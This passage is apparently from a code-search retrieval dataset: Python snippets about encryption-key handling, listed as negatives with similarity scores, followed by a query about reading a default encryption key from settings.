True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. --> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def add_key(mu_key):\n params['key'] = mu_key", "def key_encryption_key(self) -> Optional[pulumi.Input['KeyVaultAndKeyReferenceArgs']]:\n return pulumi.get(self, \"key_encryption_key\")", "def handle_key(self, key):\n pass", "def key(key):\n return key", "def _GetKeyString(self):", "def _GetKeyString(self):", "def __init__(__self__, *,\n key_encryption_key_identity: Optional[pulumi.Input['ClusterPropertiesKeyEncryptionKeyIdentityArgs']] = None,\n key_encryption_key_url: Optional[pulumi.Input[str]] = None):\n if key_encryption_key_identity is not None:\n pulumi.set(__self__, \"key_encryption_key_identity\", key_encryption_key_identity)\n if key_encryption_key_url is not None:\n pulumi.set(__self__, \"key_encryption_key_url\", key_encryption_key_url)", "def key():\n pass", "def key():\n pass", "def aes_key_wrap(self, kek: bytes, key_to_wrap: bytes) -> bytes:\n return keywrap.aes_key_wrap(kek, key_to_wrap, default_backend())", "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def private_key(self):", "def key_upload(self, key=None):\n raise NotImplementedError", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def wrap(self, key:bytes, credential:PublicKeyCredentialSource)->bytes:\n return keywrap.aes_key_wrap_with_padding(key,credential.get_bytes(True),default_backend())", "def main():\n key, plain = get_key_plain()\n encode(key, plain)", "def load_key():", "def aes_encrypt(data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = pad(data)\r\n return cipher.encrypt(padded_data)", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def make_external_key(self, data):\n return data['key']", "def __init__(self, key: bytearray):\n self.__key = key\n self.__KSA(bytearray([i for i in range(256)]))", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def load_key(self, key):\n self.key = key", "def _encrypt_data_key(self, data_key, algorithm, encryption_context):\n # Raw key string to EncryptedData\n encrypted_wrapped_key = self.config.wrapping_key.encrypt(\n plaintext_data_key=data_key.data_key, encryption_context=encryption_context\n )\n # EncryptedData to EncryptedDataKey\n return aws_encryption_sdk.internal.formatting.serialize.serialize_wrapped_key(\n key_provider=self.key_provider,\n wrapping_algorithm=self.config.wrapping_key.wrapping_algorithm,\n wrapping_key_id=self.key_id,\n encrypted_wrapped_key=encrypted_wrapped_key,\n )", "def encrypt(key, plaintext, cipher):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n p = plaintext.read()\n c = rsa.encrypt(p, k)\n\n cipher.write(c)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except OverflowError:\n click.echo(\"ERROR: Message is to long for encryption with the given key.\")", "def key():", "def encrypt(self, message, key):\n return self.translateMessage(message, key, \"encrypt\")", "def encryption_key(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"encryption_key\")", "def __init__(__self__, *,\n disk_encryption_key: Optional[pulumi.Input['KeyVaultAndSecretReferenceArgs']] = None,\n key_encryption_key: Optional[pulumi.Input['KeyVaultAndKeyReferenceArgs']] = None):\n if disk_encryption_key is not None:\n pulumi.set(__self__, \"disk_encryption_key\", disk_encryption_key)\n if key_encryption_key is not None:\n pulumi.set(__self__, \"key_encryption_key\", key_encryption_key)", "def get_key(self, key_value):\n # Storing the correct key value back to the self.key attributes.\n self.key=key_value\n self.cryptor=Fernet(self.key)", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def MakeKey(self, string, string_1, string_2):\n ...", "def __init__(self, key=None):\n\n self.key = key\n self.cryptor = None\n self.file_ext_targets = ['txt']", "def __encryptionresolver__(pk, rk, property_name):\n pass", "def md5_encrypt(self, key):\n # instantiate the md5 object in hashlib module\n md5_object = hashlib.md5()\n # encrypt the key\n md5_object.update(key)\n # return the encrypted key\n encrypted_key = md5_object.hexdigest()\n return encrypted_key", "def from_key(self, public_id, key):\n otp = self.get_otp(key)\n from_key = modhex_encode(public_id.encode('hex')) + modhex_encode(otp.encode('hex'))\n return from_key", "def _get_raw_key(self, key_id):", "def parse_key(self, key):\r\n if not key:\r\n self.aes = None # empty key == no encryption\r\n return self.parse_string(self.tmp) # must return size (see the next return)\r\n key.decode() # test availability\r\n size = len(key)\r\n for padding in (16, 24, 32): # fixed key size\r\n if size <= padding:\r\n break\r\n key += chr(0) * (padding - size)\r\n self.aes = AES.new(key)\r\n return self.parse_string(self.tmp) # if key changes you must update string\r", "def _disabled_encrypt(self, *args, **kwargs):\n raise NotImplementedError('\"encrypt\" is not supported by the \"{}\" algorithm'.format(self.java_name))", "def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:\n return jsii.get(self, \"encryptionKey\")", "def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:\n return jsii.get(self, \"encryptionKey\")", "def public_key(self):", "def InvocationAddEncKey(builder, encKey):\n return AddEncKey(builder, encKey)", "def _get_encryption_key(self, **options):\n\n raise CoreNotImplementedError()", "def key_encryption_key_identity(self) -> Optional[pulumi.Input['ClusterPropertiesKeyEncryptionKeyIdentityArgs']]:\n return pulumi.get(self, \"key_encryption_key_identity\")", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def encrypt_key(data, key):\n data = MegaCrypto.base64_decode(data)\n return sum((MegaCrypto.str_to_a32(MegaCrypto.cbc_encrypt(data[_i:_i + 16], key))\n for _i in range(0, len(data), 16)), ())", "def generate_encrypted_key(key, encryption_key):\n pub_enc_key = RSA.importKey(encryption_key)\n # RSA encryption protocol according to PKCS#1 OAEP\n cipher = PKCS1_OAEP.new(pub_enc_key)\n return cipher.encrypt(key)", "def test_encryption_public_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.encrypt_data(given))", "def addkey(unsafe_import_key):\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n if not unlock_wallet(stm):\n return\n if not unsafe_import_key:\n unsafe_import_key = click.prompt(\"Enter private key\", confirmation_prompt=False, hide_input=True)\n mph.wallet.addPrivateKey(unsafe_import_key)\n set_shared_morphene_instance(stm)", "def __init__(__self__, *,\n key_data: pulumi.Input[str]):\n pulumi.set(__self__, \"key_data\", key_data)", "def get_key(key):\n encrypt_key = pow(key, e, n)\n return encrypt_key", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def parse_key(raw_key):\n raw_key_bytes = raw_key.encode('ascii')\n try:\n validate_cmek(raw_key)\n key_type = KeyType.CMEK\n sha256 = None\n except errors.Error:\n if len(raw_key) != 44:\n raise\n key_type = KeyType.CSEK\n sha256 = hash_util.get_base64_hash_digest_string(\n hashlib.sha256(base64.b64decode(raw_key_bytes)))\n return EncryptionKey(key=raw_key, sha256=sha256, type=key_type)", "def __init__(self, pubkey, e=65537):\n if isinstance(pubkey, int):\n self.key = RSA.RsaKey(n=pubkey, e=e)\n\n else:\n if not isinstance(pubkey, str):\n raise ValueError('pubkey must be str or int.')\n\n if '----' in pubkey:\n try:\n self.key = RSA.import_key(pubkey)\n except Exception as e:\n print(e)\n else:\n if pubkey == pubkey.lower():\n pubkey = int(pubkey, 16)\n self.key = RSA.RsaKey(n=pubkey, e=e)\n else:\n pubkey = '-----BEGIN PUBLIC KEY-----\\n' + pubkey + '\\n-----END PUBLIC KEY-----'\n try:\n self.key = RSA.import_key(pubkey)\n except Exception as e:\n print(e)", "def key_handler(args):\n key = create_key(args.key_type, args.key_size, args.key_out)\n\n if not args.key_out:\n print(print_key(key))\n\n return key", "def encrypt(self, input, key, iv):\n pass", "def get_key(self):\r\n return self.__encryption_key", "def _add_key(self, key):\n key = key.strip().strip('@').lower()\n if self.homogenise_fields:\n if key in list(self.alt_dict.keys()):\n key = self.alt_dict[key]\n if not isinstance(key, ustr):\n return ustr(key, 'utf-8')\n else:\n return key", "def upload_key():\n data = check_args(('cloudProvider', 'key'))\n provider = jobs.init_provider(data, True)\n key = decrypt_key(data['key'], data['username'])\n provider.save_key(key)\n return make_response()", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def _check_key(self, key):\n raise NotImplementedError", "def set_key(self, key):\n self.key = key", "def serialize_key(key: str) -> bytes:\n return key.encode(\"utf-8\")", "def _get_encryption_key(self, obj, field_name: str):\n return hashlib.sha256(\n f'{obj.pk}::{self.get_encryption_key(obj)}::'\n f'{settings.GDPR_KEY if hasattr(settings, \"GDPR_KEY\") else settings.SECRET_KEY}::{field_name}'.encode(\n 'utf-8')).hexdigest()", "def encrypt(cls, plaintext, aad, key, iv):", "def def_key(x):\n return x", "def encrypt_and_encode(data, key):\r\n return base64.urlsafe_b64encode(aes_encrypt(data, key))", "def __init__(self, encoded_message, key):\n self.encoded_message = encoded_message\n self.key = key", "def recipient_public_key(self):", "def __generate_key(self, keyword, action):\n encryption_key = {}\n\n # get separate modified & unmodified alpha objects\n plain_alpha = self.helpers.alphabet(\"list\")\n cipher_alpha = self.helpers.alphabet(\"list\")\n\n # remove duplicate letters from the keyword\n keyword_stripped = self.helpers.unique(keyword)\n\n # remove keyword letters from cipher alpha\n for i in range(len(keyword_stripped)):\n cipher_alpha.remove(keyword_stripped[i])\n\n # append keyword letters to cipher alpha\n cipher_alpha = keyword_stripped + cipher_alpha\n\n if action == \"encrypt\":\n # generate encryption key\n for i in range(len(plain_alpha)):\n encryption_key[plain_alpha[i]] = cipher_alpha[i]\n elif action == \"decrypt\":\n # generate decryption key\n for i in range(len(plain_alpha)):\n encryption_key[cipher_alpha[i]] = plain_alpha[i]\n else:\n raise ValueError(\"Cheatin', uh?\")\n\n return encryption_key", "def encode_email(email, key):\n return", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def encrypt_data_key(self, dataKey, token, userGroup):\n masterKey = self.retrieve_master_key(token=token, userGroup=userGroup)\n box = secret.SecretBox(masterKey)\n if isinstance(dataKey, str):\n dataKey = dataKey.encode('utf-8')\n cipherText= box.encrypt(dataKey).decode('cp855')\n return cipherText", "def test_encryption(e, c):\n\n#\te = int(raw_input(\"\\nEnter e from public key\\n\"))\n#\tc = int(raw_input(\"\\nEnter c from public key\\n\"))\n\n string = raw_input(\"\\nEnter word to encrpyt\\n\")\n for i in range(0, len(string)):\n print endecrypt(ord(string[i]), e, c)", "def encrypt_letter(letter, keystr_value):\n \n letter_value = ord(letter) - 65\n if (letter_value + keystr_value) > 25:\n new_value = (letter_value + keystr_value) + 65 - 26\n encrypted_letter = chr(new_value)\n else:\n new_value = letter_value + keystr_value + 65\n encrypted_letter = chr(new_value)\n return encrypted_letter", "def setKey(self, time, attributeIndex, hash, value, view) -> None:\n ...", "def prepare_key (self, key, for_seq):\n r_key = \"%s:%d:%s\" % (self.classkey, for_seq, key)\n return r_key" ]
[ "0.6910627", "0.6908906", "0.6589015", "0.6589015", "0.65658104", "0.64406216", "0.64385355", "0.6403656", "0.6396212", "0.6384059", "0.63731337", "0.6366203", "0.633905", "0.6292146", "0.6261021", "0.62500477", "0.62206835", "0.62103766", "0.61971515", "0.6182859", "0.6168541", "0.6161391", "0.6161391", "0.6154665", "0.61417025", "0.61417025", "0.61330914", "0.611646", "0.6104688", "0.60838103", "0.6076095", "0.6066734", "0.6043034", "0.60418904", "0.6036839", "0.6034881", "0.6031524", "0.6024177", "0.6020957", "0.60196835", "0.6018721", "0.6016701", "0.60074633", "0.60000974", "0.5992623", "0.59819955", "0.59801775", "0.5976539", "0.5976323", "0.59636825", "0.59580624", "0.595429", "0.5940465", "0.5917046", "0.59112483", "0.5909821", "0.59087443", "0.5907167", "0.59024495", "0.59024495", "0.5900495", "0.58989775", "0.58936447", "0.589128", "0.58907443", "0.58885777", "0.58847207", "0.5877799", "0.5872674", "0.58571595", "0.58565414", "0.5855792", "0.5851382", "0.58476466", "0.58460546", "0.5843634", "0.58386934", "0.5828362", "0.58145696", "0.5811466", "0.58088094", "0.5803552", "0.5795303", "0.5795121", "0.5793531", "0.57787526", "0.57693815", "0.5756758", "0.57522756", "0.5750785", "0.5748262", "0.57482356", "0.5741913", "0.5740748", "0.5717498", "0.57163405", "0.5712756", "0.571268", "0.5710999", "0.5705612" ]
0.6712674
2
It requires a 32byte key.
def test_encrypt_key_invalid(self): with pytest.raises(EncryptionError): encrypt('message', key=b'0' * 31)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def create_key ():", "def __init__(self, key):\n self.bs = 16\n self.key = hashlib.sha256(key.encode()).digest()", "def load_key():", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def __init__(self, key: bytearray):\n self.__key = key\n self.__KSA(bytearray([i for i in range(256)]))", "def __init__(self,key):\n self.block_size = 32\n self.key = hashlib.sha256(key).digest()", "def key():", "def key(key):\n return key", "def load_key(self, type, keyid):\n pass", "def keyIndex(self, key):\n key ^= bsr(key, 33)\n key *= 0xff51afd7ed558ccdL\n key ^= bsr(key, 33)\n key *= 0xc4ceb9fe1a85ec53L\n key ^= bsr(key, 33)\n return key", "def __init__(self, key):\n self.key = key\n self.BLOCK_SIZE = 16", "def generate_random_key():\n return '%030x' % (random.randrange(256**15),)", "def key():\n pass", "def key():\n pass", "def _get_raw_key(self, key_id):", "def _GetKeyString(self):", "def _GetKeyString(self):", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16), int(key[2] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def generate_key():\n return get_random_bytes(KEY_SIZE)", "def _newKey(self, key):\n pass", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def generate_key():\n\tkey = [ randint(0,255) for i in range(16) ]\n\treturn bytes( key )", "def _set_key(self, key):\n\n # select 56 bits from the 64-bit key\n key = self._permutate(self.__pc1, self._string_to_bitlist(key))\n self.L = key[:28]\n self.R = key[28:]\n for i in range(0, 16):\n for j in range(0, self.__left_rotations[i]):\n self.L.append(self.L[0])\n del self.L[0]\n self.R.append(self.R[0])\n del self.R[0]\n # select 48 bits from 56 bits\n self.Kn[i] = self._permutate(self.__pc2, self.L + self.R)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def isValidKey(key):\n return True", "def key_id(cls, url: str):\r\n ...", "def load_key():\n return open(\"Secret.key\",\"rb\").read()", "def hashId(key, size):\n return sum([ord(c) for c in key]) % size", "def get_key_id(self):", "def hash_key(self, key):\r\n hashed_key = sum((ord(char) for char in key))\r\n return hashed_key % 20", "def generate_key(self)->bytes:\n return os.urandom(32)", "def __init__(self, key):\n self._block_size = AES.block_size\n self._key = hashlib.sha256(get_as_bytes(key)).digest()", "def load_key(self, key):\n self.key = key", "def private_key(self):", "def public_key(self):", "def generate_key():\n return unicode(hashlib.sha224(str(random.getrandbits(128))).hexdigest())", "def _key_hash(self, key):\n\n split_key = key.strip(' ').split(' ')[1]\n return int(split_key)", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def _check_key(self, key):\n raise NotImplementedError", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def hex_key(uid: Text, mp: Text) -> Text:\n\n key = sha256(mp.encode('utf-8') + admin_pass.encode('utf-8')).hexdigest()\n return sha256(uid.lower().encode('utf-8') + key.encode('utf-8')).hexdigest()[:40]", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def gen_key():\n key = os.urandom(32) # 256 bit\n return base64.b64encode(key).rstrip('=') # strip off padding", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def __init__(self, key):\n self.key = key", "def from_key(self, public_id, key):\n otp = self.get_otp(key)\n from_key = modhex_encode(public_id.encode('hex')) + modhex_encode(otp.encode('hex'))\n return from_key", "def MakeKey(self, string, string_1, string_2):\n ...", "def prepare_key(self, key):\n return smart_str(key)", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def __init__(self, aKey):\n self.key = aKey\n\n # CRC can be used to validate a key (very roughly)\n # if you store the CRC from a previous keyword\n # and then compare with a newly generated one and\n # they are the same then chances are the keyword\n # is correct - only a single byte so not that reliable\n self.crc = 0 \n for x in self.key:\n intX = ord(x)\n self.crc = self.crc ^ intX", "def test_get_key_digest_with_integer_key(self):\n\n digest = self.as_connection.get_key_digest(\"test\", \"demo\", 1)\n\n assert isinstance(digest, bytearray)", "def _key_array(key):\n key = map(ord, key)[:16]\n initial = map(ord, \"6170383452343567\")\n while len(key) < len(initial):\n key.append(initial[len(key)])\n return key", "def load_key(self):\n\t return open(\"key.key\", \"rb\").read()", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def create_key(message, key):\n if len(key) > len(message):\n return key[0:len(message)]\n new_key = key * int(len(message)/len(key))\n new_key += key[0:len(message) - len(new_key)]\n return new_key", "def __generate_key(length):\n if length % 2 != 0:\n raise ValueError(\"'length' must be a multiple of 2\")\n length_bytes = int(length / 2) # length of key in bytes\n key_bytes = os.urandom(length_bytes)\n return binascii.hexlify(key_bytes).decode()", "def keyExp(key):\r\n def sub2Nib(b):\r\n \"\"\"Swap each nibble and substitute it using sBox\"\"\"\r\n return sBox[b >> 4] + (sBox[b & 0x0f] << 4)\r\n \r\n Rcon1, Rcon2 = 0b10000000, 0b00110000\r\n w[0] = (key & 0xff00) >> 8\r\n w[1] = key & 0x00ff\r\n w[2] = w[0] ^ Rcon1 ^ sub2Nib(w[1])\r\n w[3] = w[2] ^ w[1]\r\n w[4] = w[2] ^ Rcon2 ^ sub2Nib(w[3])\r\n w[5] = w[4] ^ w[3]", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def generate_aes_key ( ) :\n import hashlib\n sr = Crypto.Random.random.StrongRandom( )\n key_bits = sr.getrandbits( 256 )\n sha_key = hashlib.sha256( str( key_bits ) ).digest( )\n return sha_key", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def load_key():\n return open(\"secret.key\", \"rb\").read()", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def _encode_key(self, key: str) -> str:\n return key", "def __init__(self, key=None):\n self.key = key", "def test_getKey_keyexists(self):\n filename = self.mktemp()\n with open(filename, 'wb') as fh:\n fh.write(SEKRIT_KEY)\n fh.flush()\n\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))\n self.assertEqual(SEKRIT_KEY, key,\n \"\"\"The example key and the one read from file differ!\n key (in hex): %s\n SEKRIT_KEY (in hex): %s\"\"\"\n % (key.encode('hex'), SEKRIT_KEY.encode('hex')))", "def _filesystem_safe_encode(key):\n return hashlib.sha256(key.encode()).hexdigest()", "def hash_key(self):", "def generate_key():\r\n\t\treturn ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in range(123))", "def load(self, key: str) -> str:\n pass", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def JAVA_NATIVE(key):\n h = 0\n l = len(key)\n for (idx,c) in enumerate(key):\n h += ord(c)*31**(l-(idx+1))\n return _signed_int32(h)", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def key_upload(self, key=None):\n raise NotImplementedError", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def genKey(length=32):\r\n return os.urandom(length)", "def key_handler(args):\n key = create_key(args.key_type, args.key_size, args.key_out)\n\n if not args.key_out:\n print(print_key(key))\n\n return key", "def keyGen(key):\n def leftShift(keyBitList):\n \"\"\"Perform a circular left shift on the first and second five bits\"\"\"\n shiftedKey = [None] * KeyLength\n shiftedKey[0:9] = keyBitList[1:10]\n shiftedKey[4] = keyBitList[0]\n shiftedKey[9] = keyBitList[5]\n return shiftedKey\n\n # Converts input key (integer) into a list of binary digits\n keyList = [(key & 1 << i) >> i for i in reversed(range(KeyLength))]\n permKeyList = [None] * KeyLength\n for index, elem in enumerate(P10table):\n permKeyList[index] = keyList[elem - 1]\n shiftedOnceKey = leftShift(permKeyList)\n shiftedTwiceKey = leftShift(leftShift(shiftedOnceKey))\n subKey1 = subKey2 = 0\n for index, elem in enumerate(P8table):\n subKey1 += (128 >> index) * shiftedOnceKey[elem - 1]\n subKey2 += (128 >> index) * shiftedTwiceKey[elem - 1]\n return (subKey1, subKey2)", "def game_key(proto_obj):\n return game_key_full(proto_obj.id_str)", "def test_getKey_tmpfile(self):\n filename = self.mktemp()\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def fullkey(self, key):\n if len(self.basekey) > 0:\n return \"{}:{}\".format(self.basekey, key)\n else:\n return key", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def _hash(self, key):\n if self.function == 'fnv':\n h = 2166136261\n for i in range(len(key)):\n h = (h * 16777619) ^ ord(key[i])\n return h\n elif self.function == 'add':\n h = 0\n for i in range(len(key)):\n h += ord(key[i])\n return h", "def serialize_key(key: str) -> bytes:\n return key.encode(\"utf-8\")", "def gen_api_key():\r\n m = hashlib.sha256()\r\n m.update(get_random_word(12))\r\n return unicode(m.hexdigest()[:12])", "def parse_key(self, key):\r\n if not key:\r\n self.aes = None # empty key == no encryption\r\n return self.parse_string(self.tmp) # must return size (see the next return)\r\n key.decode() # test availability\r\n size = len(key)\r\n for padding in (16, 24, 32): # fixed key size\r\n if size <= padding:\r\n break\r\n key += chr(0) * (padding - size)\r\n self.aes = AES.new(key)\r\n return self.parse_string(self.tmp) # if key changes you must update string\r", "def randkey():\n return binascii.b2a_hex(os.urandom(15))", "def test_generate_api_key():\n\n key = auth.generate_api_key() # returns a NamedTuple with api_key and hashed_key\n hashed_api_key = sha256(key.api_key.encode('utf-8')).hexdigest()\n assert hashed_api_key == key.hashed_key", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def h_python(key, N):\n return hash(key) % N", "def __LFSR(self, key: bytearray) -> int:\n x = key.pop()\n out = x ^ key[254] ^ key[244]\n key.append(out)\n return out" ]
[ "0.79996747", "0.71131784", "0.70681524", "0.7063389", "0.70164996", "0.6956813", "0.69228464", "0.69088066", "0.6835613", "0.67935926", "0.6759126", "0.6737713", "0.6699715", "0.66468084", "0.66468084", "0.65837467", "0.65774214", "0.65774214", "0.65307164", "0.6464985", "0.64625424", "0.643235", "0.64101267", "0.6408171", "0.63811934", "0.6369116", "0.63650167", "0.6344605", "0.6334173", "0.63146996", "0.62892807", "0.6288386", "0.6286577", "0.6285275", "0.6283864", "0.6278853", "0.6249924", "0.6238881", "0.62190056", "0.6217997", "0.6213589", "0.62095004", "0.6209226", "0.6201688", "0.61836094", "0.6166667", "0.6165022", "0.6165022", "0.6163094", "0.6145223", "0.6144982", "0.6144738", "0.61326903", "0.61309487", "0.61263996", "0.61202836", "0.61177725", "0.6115924", "0.6086478", "0.6084419", "0.60821015", "0.60734737", "0.6071975", "0.6069795", "0.6059456", "0.60388273", "0.60339713", "0.60257035", "0.6022661", "0.6008294", "0.6002849", "0.5990089", "0.59898555", "0.59878814", "0.59869343", "0.5986146", "0.5984032", "0.597779", "0.5976863", "0.59743935", "0.5973422", "0.59568775", "0.59558827", "0.5949787", "0.5946712", "0.59427214", "0.59401184", "0.5936034", "0.5932137", "0.5931684", "0.59098715", "0.5903735", "0.590285", "0.58903736", "0.5884997", "0.58776677", "0.5875996", "0.5874685", "0.5870695", "0.58642685" ]
0.60107034
69
It gets its default key from settings.
def test_encrypt_key_default(self, settings): settings.CHITON_ENCRYPTION_KEY = None with pytest.raises(EncryptionError): encrypt('message')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
